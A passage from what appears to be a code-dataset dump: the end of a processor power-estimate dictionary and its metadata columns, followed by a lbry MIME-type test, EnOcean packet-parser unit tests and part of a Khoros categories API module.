'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.235539,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.489666,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.95303,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00109098,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00109098,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000969312,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000385665,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000915555,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00406683,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00977896,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0612699,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.89729,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.164237,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.2081,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 6.30495,
'Instruction Fetch Unit/Runtime Dynamic': 0.447453,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0474883,
'L2/Runtime Dynamic': 0.00730031,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.59348,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.661821,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0438813,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0438814,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.80069,
'Load Store Unit/Runtime Dynamic': 0.92211,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.108204,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.216408,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0384019,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0390734,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.242319,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.027048,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.464396,
'Memory Management Unit/Runtime Dynamic': 0.0661213,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 18.2815,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.269073,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0125444,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0983465,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.379964,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.77597,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 4.014346384814995,
'Runtime Dynamic': 4.014346384814995,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.364186,
'Runtime Dynamic': 0.177291,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 73.6741,
'Peak Power': 106.786,
'Runtime Dynamic': 14.9538,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 73.3099,
'Total Cores/Runtime Dynamic': 14.7765,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.364186,
'Total L3s/Runtime Dynamic': 0.177291,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
| 75.071116
| 124
| 0.68211
| 8,082
| 68,615
| 5.785078
| 0.067929
| 0.123538
| 0.112929
| 0.093423
| 0.938702
| 0.930831
| 0.917442
| 0.886921
| 0.862688
| 0.842135
| 0
| 0.132046
| 0.22431
| 68,615
| 914
| 125
| 75.071116
| 0.746411
| 0
| 0
| 0.642232
| 0
| 0
| 0.657354
| 0.048094
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6d2143471ce78eca00ad6886f27b2dcfc1255aa1
| 713
|
py
|
Python
|
tests/unit/lbrynet_daemon/test_mime_types.py
|
abueide/lbry
|
7f5deaf6c80422a30b3714d4bf12e028756ed9fe
|
[
"MIT"
] | null | null | null |
tests/unit/lbrynet_daemon/test_mime_types.py
|
abueide/lbry
|
7f5deaf6c80422a30b3714d4bf12e028756ed9fe
|
[
"MIT"
] | null | null | null |
tests/unit/lbrynet_daemon/test_mime_types.py
|
abueide/lbry
|
7f5deaf6c80422a30b3714d4bf12e028756ed9fe
|
[
"MIT"
] | null | null | null |
import unittest
from lbrynet.schema import mime_types
class TestMimeTypes(unittest.TestCase):
    """Unit tests for ``mime_types.guess_media_type``."""

    def test_mp4_video(self):
        # Known extensions resolve to their MIME type regardless of case.
        for filename in ("test.mp4", "test.MP4"):
            self.assertEqual("video/mp4", mime_types.guess_media_type(filename))

    def test_x_ext_(self):
        # Unrecognized extensions are mapped to an application/x-ext-* type.
        for filename in ("test.lbry", "test.LBRY"):
            self.assertEqual("application/x-ext-lbry", mime_types.guess_media_type(filename))

    def test_octet_stream(self):
        # A missing or empty extension falls back to the generic binary type.
        for filename in ("test.", "test"):
            self.assertEqual("application/octet-stream", mime_types.guess_media_type(filename))
| 41.941176
| 92
| 0.737728
| 97
| 713
| 5.154639
| 0.257732
| 0.126
| 0.168
| 0.228
| 0.728
| 0.728
| 0.728
| 0.728
| 0.728
| 0.728
| 0
| 0.008026
| 0.126227
| 713
| 16
| 93
| 44.5625
| 0.794543
| 0
| 0
| 0
| 0
| 0
| 0.214586
| 0.129032
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.25
| false
| 0
| 0.166667
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6d2f53fba792a29d8536f7b5bab7f4df778d8d27
| 6,196
|
py
|
Python
|
test/test_enocean_packet_hsm.py
|
MainRo/python-flock
|
e1faa78d6aba374493336651848daadad82387a8
|
[
"MIT"
] | null | null | null |
test/test_enocean_packet_hsm.py
|
MainRo/python-flock
|
e1faa78d6aba374493336651848daadad82387a8
|
[
"MIT"
] | null | null | null |
test/test_enocean_packet_hsm.py
|
MainRo/python-flock
|
e1faa78d6aba374493336651848daadad82387a8
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from flock.controller.enocean.protocol import EnoceanPacketHsm
class EnoceanPacketHsmTestCase(TestCase):
    """Exercises the EnoceanPacketHsm byte-at-a-time parser state machine."""

    @staticmethod
    def _feed(hsm, data):
        # Drive the state machine with each byte of *data*, in order.
        for byte in data:
            hsm.on_data(byte)

    def test_init(self):
        # A fresh HSM starts in the sync state with no packet available.
        hsm = EnoceanPacketHsm()
        self.assertEqual(hsm.state_sync, hsm.current_state)
        self.assertIsNone(hsm.get_packet())

    def test_sync(self):
        # A sync byte (0x55) moves the machine into the header state.
        hsm = EnoceanPacketHsm()
        hsm.on_data('\x55')
        self.assertEqual(hsm.state_header, hsm.current_state)
        self.assertIsNone(hsm.get_packet())

    def test_sync_lock(self):
        hsm = EnoceanPacketHsm()
        # invalid sync packets must be dropped
        for bad_byte in ('\x50', '\x51', '\x52'):
            hsm.on_data(bad_byte)
            self.assertEqual(hsm.state_sync, hsm.current_state)
        # and sync packet must match
        hsm.on_data('\x55')
        self.assertEqual(hsm.state_header, hsm.current_state)
        self.assertIsNone(hsm.get_packet())

    def test_header(self):
        # After sync, four header bytes advance to the header-CRC state.
        hsm = EnoceanPacketHsm()
        hsm.on_data('\x55')
        self.assertEqual(hsm.state_header, hsm.current_state)
        self._feed(hsm, '\x02\x05\x07\x08')
        self.assertEqual(hsm.state_crc_header, hsm.current_state)

    def test_crc_header(self):
        # A header CRC byte moves the machine into the data state.
        hsm = EnoceanPacketHsm()
        self._feed(hsm, '\x55\x02\x05\x07\x08')
        self.assertEqual(hsm.state_crc_header, hsm.current_state)
        hsm.on_data('\x42')
        self.assertEqual(hsm.state_data, hsm.current_state)

    def test_crc_header_no_optional(self):
        """ packet with no optional data
        """
        hsm = EnoceanPacketHsm()
        # sync, size MSB, size LSB, optional size, type
        self._feed(hsm, '\x55\x00\x02\x00\x08')
        self.assertEqual(hsm.state_crc_header, hsm.current_state)
        hsm.on_data('\x42')
        self.assertEqual(hsm.state_data, hsm.current_state)

    def test_crc_header_no_data(self):
        """ packet with no data but optional data
        """
        hsm = EnoceanPacketHsm()
        # sync, size MSB, size LSB, optional size, type
        self._feed(hsm, '\x55\x00\x00\x07\x08')
        self.assertEqual(hsm.state_crc_header, hsm.current_state)
        hsm.on_data('\x42')
        self.assertEqual(hsm.state_optional_data, hsm.current_state)

    def test_crc_header_no_data_no_optional(self):
        """ packet with no data and no optional data
        """
        hsm = EnoceanPacketHsm()
        # sync, size MSB, size LSB, optional size, type
        self._feed(hsm, '\x55\x00\x00\x00\x08')
        self.assertEqual(hsm.state_crc_header, hsm.current_state)
        hsm.on_data('\x42')
        self.assertEqual(hsm.state_crc_data, hsm.current_state)

    def test_data(self):
        # With a data size of 0x0002, two data bytes advance to optional data.
        hsm = EnoceanPacketHsm()
        self._feed(hsm, '\x55\x00\x02\x07\x08\x42')
        self.assertEqual(hsm.state_data, hsm.current_state)
        self._feed(hsm, '\x01\x02')
        self.assertEqual(hsm.state_optional_data, hsm.current_state)

    def test_optional_data(self):
        # With an optional size of 0x01, one byte advances to the data CRC.
        hsm = EnoceanPacketHsm()
        self._feed(hsm, '\x55\x00\x02\x01\x08\x42\x01\x02')
        self.assertEqual(hsm.state_optional_data, hsm.current_state)
        hsm.on_data('\x03')
        self.assertEqual(hsm.state_crc_data, hsm.current_state)

    def test_crc_data(self):
        # The trailing CRC byte returns the machine to the sync state.
        hsm = EnoceanPacketHsm()
        self._feed(hsm, '\x55\x00\x02\x01\x08\x42\x01\x02\x03')
        self.assertEqual(hsm.state_crc_data, hsm.current_state)
        hsm.on_data('\x42')
        self.assertEqual(hsm.state_sync, hsm.current_state)

    def test_data_packet(self):
        # A complete packet is parsed and exposed via get_packet().
        data = '\x55\x00\x02\x01\x08\x42\x01\x02\x03\x42'
        hsm = EnoceanPacketHsm()
        self._feed(hsm, data)
        self.assertEqual(hsm.state_sync, hsm.current_state)
        packet = hsm.get_packet()
        self.assertEqual(ord(data[4]), packet['type'])
        self.assertEqual(data[6:8], packet['data'])
        self.assertEqual(data[8:9], packet['optional_data'])

    def test_packet_no_optional(self):
        # An optional size of zero yields an empty optional_data field.
        data = '\x55\x00\x02\x00\x08\x42\x01\x02\x42'
        hsm = EnoceanPacketHsm()
        self._feed(hsm, data)
        self.assertEqual(hsm.state_sync, hsm.current_state)
        packet = hsm.get_packet()
        self.assertEqual(ord(data[4]), packet['type'])
        self.assertEqual(data[6:8], packet['data'])
        self.assertEqual('', packet['optional_data'])

    def test_packet_empty(self):
        """ Packet with no data and no optional data
        """
        data = '\x55\x00\x00\x00\x08\x42\x42'
        hsm = EnoceanPacketHsm()
        self._feed(hsm, data)
        self.assertEqual(hsm.state_sync, hsm.current_state)
        packet = hsm.get_packet()
        self.assertEqual(ord(data[4]), packet['type'])
        self.assertEqual('', packet['data'])
        self.assertEqual('', packet['optional_data'])
| 32.783069
| 68
| 0.602808
| 808
| 6,196
| 4.415842
| 0.082921
| 0.089686
| 0.161435
| 0.161155
| 0.902466
| 0.896861
| 0.856222
| 0.835482
| 0.810818
| 0.794002
| 0
| 0.040053
| 0.262589
| 6,196
| 188
| 69
| 32.957447
| 0.740862
| 0.092156
| 0
| 0.822695
| 0
| 0
| 0.073762
| 0.018665
| 0
| 0
| 0
| 0
| 0.262411
| 1
| 0.099291
| false
| 0
| 0.014184
| 0
| 0.120567
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b61aacdd91a4c92b9cec32fcfefd6ebc0a425786
| 24,983
|
py
|
Python
|
khoros/structures/categories.py
|
stevenspasbo/khoros
|
7a50be1546fd90825343957f9c579ed804c2d480
|
[
"MIT"
] | 7
|
2020-02-21T16:31:08.000Z
|
2021-12-13T13:28:55.000Z
|
khoros/structures/categories.py
|
stevenspasbo/khoros
|
7a50be1546fd90825343957f9c579ed804c2d480
|
[
"MIT"
] | 53
|
2020-06-25T23:59:38.000Z
|
2022-03-14T20:38:03.000Z
|
khoros/structures/categories.py
|
stevenspasbo/khoros
|
7a50be1546fd90825343957f9c579ed804c2d480
|
[
"MIT"
] | 3
|
2020-10-20T15:53:21.000Z
|
2021-06-23T18:13:11.000Z
|
# -*- coding: utf-8 -*-
"""
:Module: khoros.structures.categories
:Synopsis: This module contains functions specific to categories within the Khoros Community platform
:Usage: ``from khoros.structures import categories``
:Example: ``category_id = categories.get_category_id(url)``
:Created By: Jeff Shurtliff
:Last Modified: Jeff Shurtliff
:Modified Date: 17 Jul 2020
"""
import warnings
from . import base
from ..utils import log_utils
from .. import api, liql, errors
# Initialize the logger for this module
logger = log_utils.initialize_logging(__name__)
def create(khoros_object, category_id, category_title, parent_id=None, return_json=True):
    """This function creates a new category.

    .. versionadded:: 2.5.0

    :param khoros_object: The core :py:class:`khoros.Khoros` object
    :type khoros_object: class[khoros.Khoros]
    :param category_id: The Category ID of the new category (e.g. ``video-games``)
    :type category_id: str
    :param category_title: The title of the new category (e.g. ``Video Games``)
    :type category_title: str
    :param parent_id: The Category ID of the parent category (optional)
    :type parent_id: str, None
    :param return_json: Determines whether or not the response should be returned in JSON format (``True`` by default)
    :type return_json: bool
    :returns: The response from the API call
    :raises: :py:exc:`ValueError`, :py:exc:`khoros.errors.exceptions.POSTRequestError`,
             :py:exc:`khoros.errors.exceptions.APIConnectionError`
    """
    # Nest the endpoint under the parent category only when one was supplied
    if parent_id:
        endpoint = f"categories/id/{parent_id}/categories/add"
    else:
        endpoint = "categories/add"
    payload = {'category.id': category_id, 'category.title': category_title}
    return api.make_v1_request(khoros_object, endpoint, payload, 'POST', return_json)
def get_category_id(url):
    """This function parses the Category ID out of a given category URL.

    .. versionchanged:: 2.6.0
       The function was refactored to leverage the :py:func:`khoros.structures.base.get_structure_id` function.

    :param url: The URL from which to parse out the Category ID
    :type url: str
    :returns: The Category ID retrieved from the URL
    :raises: :py:exc:`khoros.errors.exceptions.InvalidURLError`
    """
    # Delegate to the shared structure-ID parser used by all structure types
    category_id = base.get_structure_id(url)
    return category_id
def get_total_count(khoros_object):
    """This function returns the total number of categories within the Khoros Community environment.

    .. versionadded:: 2.6.0

    :param khoros_object: The core :py:class:`khoros.Khoros` object
    :type khoros_object: class[khoros.Khoros]
    :returns: The total number of categories as an integer
    :raises: :py:exc:`khoros.errors.exceptions.GETRequestError`
    """
    # LiQL performs the count server-side for the 'categories' collection
    total_count = liql.get_total_count(khoros_object, 'categories')
    return total_count
def get_total_category_count(khoros_object):
    """This function returns the total number of categories within the Khoros Community environment.

    .. deprecated:: 2.6.0
       Use the :py:func:`khoros.structures.categories.get_total_count` function instead.

    :param khoros_object: The core :py:class:`khoros.Khoros` object
    :type khoros_object: class[khoros.Khoros]
    :returns: The total number of categories as an integer
    :raises: :py:exc:`khoros.errors.exceptions.GETRequestError`
    """
    # The original message was missing a space between the implicitly
    # concatenated string literals ("...by the'khoros..."); fixed here.
    warnings.warn("The 'khoros.structures.categories.get_total_category_count' function has been deprecated by "
                  "the 'khoros.structures.categories.get_total_count' function and will be removed in a future "
                  "release.", DeprecationWarning)
    return get_total_count(khoros_object)
def category_exists(khoros_object, category_id=None, category_url=None):
    """This function checks to see if a category exists.

    .. versionadded:: 2.7.0

    :param khoros_object: The core :py:class:`khoros.Khoros` object
    :type khoros_object: class[khoros.Khoros]
    :param category_id: The ID of the category to check
    :type category_id: str, None
    :param category_url: The URL of the category to check
    :type category_url: str, None
    :returns: Boolean value indicating whether or not the category already exists
    :raises: :py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
    """
    # The generic existence check handles both ID- and URL-based lookups
    exists = base.structure_exists(khoros_object, 'category', category_id, category_url)
    return exists
def get_category_details(khoros_object, identifier, first_item=True):
    """Return a dictionary of configuration settings for a category.

    .. versionadded:: 2.1.0

    :param khoros_object: The core :py:class:`khoros.Khoros` object
    :type khoros_object: class[khoros.Khoros]
    :param identifier: The Category ID or Category URL with which to identify the category
    :type identifier: str
    :param first_item: Filters the response data to the first item returned (``True`` by default)
    :type first_item: bool
    :returns: The category details within a dictionary
    :raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
             :py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
             :py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
    """
    details = base.get_details(khoros_object, identifier, 'category', first_item)
    return details
def get_category_field(khoros_object, field, identifier=None, category_details=None):
    """Return a single category field value from the Khoros Community API.

    .. versionadded:: 2.1.0

    :param khoros_object: The core :py:class:`khoros.Khoros` object
    :type khoros_object: class[khoros.Khoros]
    :param field: The field from the :py:class:`khoros.structures.base.Mapping` class whose value should be returned
    :type field: str
    :param identifier: The Category ID or Category URL with which to identify the category
    :type identifier: str, None
    :param category_details: The data captured from the :py:func:`khoros.structures.base.get_details` function
    :type category_details: dict, None
    :returns: The requested field in its native format
    :raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
             :py:exc:`khoros.errors.exceptions.InvalidFieldError`,
             :py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
             :py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
    """
    field_value = base.get_structure_field(khoros_object, field, identifier,
                                           structure_type='category', details=category_details)
    return field_value
def get_url(khoros_object, category_id=None, category_details=None):
    """This function retrieves the URL of a given category.

    .. versionadded:: 2.1.0

    :param khoros_object: The core :py:class:`khoros.Khoros` object
    :type khoros_object: class[khoros.Khoros]
    :param category_id: The ID of the category to be evaluated (optional if ``category_details`` dictionary is provided)
    :type category_id: str, None
    :param category_details: The data captured from the :py:func:`khoros.structures.base.get_details` function
    :type category_details: dict, None
    :returns: The full URL of the category
    :raises: :py:exc:`khoros.errors.exceptions.InvalidFieldError`,
             :py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
             :py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
    """
    category_url = get_category_field(khoros_object, 'view_href', category_id, category_details)
    if '://' not in category_url:
        # The API returned a relative href; prepend the community base URL.
        # Reuse the value already retrieved above instead of performing a
        # second (potentially network-bound) field lookup as before.
        base_url = khoros_object.core['community_url']
        category_url = f"{base_url}{category_url}"
    return category_url
def get_title(khoros_object, identifier=None, full_title=True, short_title=False, category_details=None):
    """Retrieve the full and/or short title of a category.

    .. versionadded:: 2.1.0

    :param khoros_object: The core :py:class:`khoros.Khoros` object
    :type khoros_object: class[khoros.Khoros]
    :param identifier: The Category ID or Category URL with which to identify the category
    :type identifier: str, None
    :param full_title: Return the full title of the category (``True`` by default)
    :type full_title: bool
    :param short_title: Return the short title of the category (``False`` by default)
    :type short_title: bool
    :param category_details: Dictionary containing category details (optional)
    :type category_details: dict, None
    :returns: A single title string, or a ``(full, short)`` tuple when both are requested
    :raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
             :py:exc:`khoros.errors.exceptions.InvalidFieldError`,
             :py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
             :py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
    """
    # At least one of the two title flavors must be requested.
    if not (full_title or short_title):
        raise errors.exceptions.MissingRequiredDataError(
            "Must return at least the full title or the short title.")
    if not category_details:
        category_details = get_category_details(khoros_object, identifier)
    full_value = category_details['title']
    short_value = category_details['short_title']
    if full_title and short_title:
        return full_value, short_value
    return full_value if full_title else short_value
def get_description(khoros_object, identifier=None, category_details=None):
    """Retrieve the description configured for a category.

    .. versionadded:: 2.1.0

    :param khoros_object: The core :py:class:`khoros.Khoros` object
    :type khoros_object: class[khoros.Khoros]
    :param identifier: The Category ID or Category URL with which to identify the category
    :type identifier: str, None
    :param category_details: Previously captured category details (optional)
    :type category_details: dict, None
    :returns: The description in string format
    :raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
             :py:exc:`khoros.errors.exceptions.InvalidFieldError`,
             :py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
             :py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
    """
    return get_category_field(khoros_object, 'description', identifier=identifier,
                              category_details=category_details)
def get_parent_type(khoros_object, identifier=None, category_details=None):
    """Retrieve the type of the parent structure of a category.

    .. versionadded:: 2.1.0

    :param khoros_object: The core :py:class:`khoros.Khoros` object
